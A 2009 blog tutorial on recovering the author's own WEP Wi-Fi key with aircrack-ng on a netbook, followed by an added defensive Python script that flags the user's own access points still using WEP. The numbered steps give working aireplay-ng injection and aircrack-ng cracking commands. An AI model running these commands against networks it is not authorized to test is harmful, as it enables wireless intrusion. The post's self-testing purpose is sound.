December 13, 2009
Aircrack-ng on the Acer Aspire One (AOA-150)
Lately I've been fooling around with aircrack-ng to test out my own network, and it's been a real eye-opener for me on how weak WEP is: I was able to crack my 128-bit password in about 5 minutes on a rather underpowered netbook (and this includes the time it takes to boot up the PC). Here's a short tutorial on how it's done, and I recommend anybody who is interested to give it a try!
Apparently there is a pretty solid self-contained distro of aircrack tailored for the AOA, which can be found here:
Slitaz Aircrack-ng Distribution
But unfortunately this one didn't work for me because I swapped out the included Atheros wireless in favor of a Dell 1390 card with a Broadcom chipset. I know the Atheros is better for performance and especially for poking around for security testing, but to get my Hackintosh running reliably I needed to perform the swap.
Since I'm probably not the only person in the world who has done this (if the aspireoneuser.com OSX forums are any indication), I had to look around and find an alternative way, which turned out to be not that bad. I'm certainly no Linux guru, but this is as much for myself as it is for others, and these simple steps worked for me with *my* setup, and if it can also benefit others in my situation then that's great.
1. Download BackTrack 4 Pre from its website
2. Either burn it to DVD and boot it from an external drive, or get a suitable USB stick and use UNetbootin to make a bootable stick.
3. A boot menu will pop up, and on my screen it was almost impossible to tell which menu option I had highlighted; once you get the screen just press Down once (it will be on the 800x600 option) and hit Enter
4. Once the console is up, type "startx" and hit Enter
5. X will boot, and open up a console from here (it's a little black box icon in the lower left corner)
6. Type "airmon-ng start wlan0" to set the card in monitor mode
7. Next type "airodump-ng wlan0" and a list of APs detected will present itself, find yours and note its channel (CH). Make sure it's using WEP too!
8. Now to set the channel, type "airodump-ng -c channel wlan0" where channel is the channel of your AP from earlier
9. Leave this running and open up a new console window
10. Type "airodump-ng -c channel --bssid macaddr -w dump wlan0" where channel is your channel and macaddr is the mac address of your AP, which can be copied over from the first window you left running
11. Leave this running too, and open up another console
12. Type "aireplay-ng --fakeauth 0 -e essid wlan0" where essid is the name of your AP. It should spit out some stuff and say Authentication Successful :-)
13. Check the previous window and you should see some connected clients, notably your own PC. Note your own MAC address if you don't know it offhand
14. Now type "aireplay-ng --arpreplay -b macaddr -h yourmac wlan0" where macaddr is the AP MAC address and yourmac is the MAC address of your wireless card from the previous step
15. Give it a few moments and the window should start scrolling like mad
16. Open up a new console again, and now type "aircrack-ng -b macaddr dump*.cap" where macaddr is the AP mac. It will print out a nice little table and start crunching numbers.
17. Give it some time, but if you have enough data collected it should take no more than a few seconds to get the key. Note the number of "IVs" it has collected. We are looking for something in the range of 50,000 IVs to make getting the passkey viable. If you have fewer than that, then just hit Ctrl+C and exit, wait a few more minutes and try again. I've personally seen as little as 10k IVs and still been able to get the passkey, and other times had more than 100k and got nothing. In the end it's just a bit of old-fashioned trial and error: if it keeps going and going, just quit and give it some time, then give it another shot. Eventually you'll have enough data to analyze and pop! Out comes the WEP key (in hex).
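To follow up on a test like this from the defensive side, here is an added example (not part of the original post) that reads an airodump-ng summary CSV and reports which of your own access points still advertise WEP and should be moved to WPA2. It assumes the summary file airodump-ng writes alongside the capture when `-w` is used has the column layout shown in the sample; the function names, sample rows and BSSIDs are constructed for illustration.

```python
import csv
import io

# Constructed sample in airodump-ng's summary-CSV layout (not real capture data).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-12-13 04:10:01, 2009-12-13 04:15:42,  6,  54, WEP , WEP,   , -45,      312,    48210,   0.  0.  0.  0,   7, homenet,
66:77:88:99:AA:BB, 2009-12-13 04:10:03, 2009-12-13 04:15:40, 11,  54, WPA2, CCMP, PSK, -60,      290,        0,   0.  0.  0.  0,   8, upstairs,
CC:DD:EE:FF:00:11, 2009-12-13 04:10:05, 2009-12-13 04:15:41,  1,  54, WEP , WEP,   , -70,      150,        0,   0.  0.  0.  0,   5, other,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:01, 2009-12-13 04:11:00, 2009-12-13 04:15:42, -40,      900, 00:11:22:33:44:55,
"""


def parse_access_points(text):
    """Return one dict per access-point row; stop at the station section."""
    aps, header = [], None
    for row in csv.reader(io.StringIO(text)):
        cells = [c.strip() for c in row]
        if not any(cells):
            continue                      # blank separator line
        if cells[0] == "BSSID":
            header = cells                # column names for the AP section
        elif cells[0] == "Station MAC":
            break                         # client list follows; not needed here
        elif header and len(cells) >= len(header):
            aps.append(dict(zip(header, cells)))
    return aps


def wep_findings(text, my_bssids):
    """Return (bssid, essid, ivs_seen) for APs in my_bssids that advertise WEP."""
    mine = {b.upper() for b in my_bssids}  # only audit APs you own
    findings = []
    for ap in parse_access_points(text):
        if ap["BSSID"].upper() in mine and "WEP" in ap["Privacy"].split():
            findings.append((ap["BSSID"], ap["ESSID"], int(ap["# IV"])))
    return findings


if __name__ == "__main__":
    for finding in wep_findings(SAMPLE_CSV, ["00:11:22:33:44:55", "66:77:88:99:AA:BB"]):
        print("still on WEP, move to WPA2:", finding)
```
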
I hope this helped and most of all have fun!
Posted by error : December 13, 2009 04:44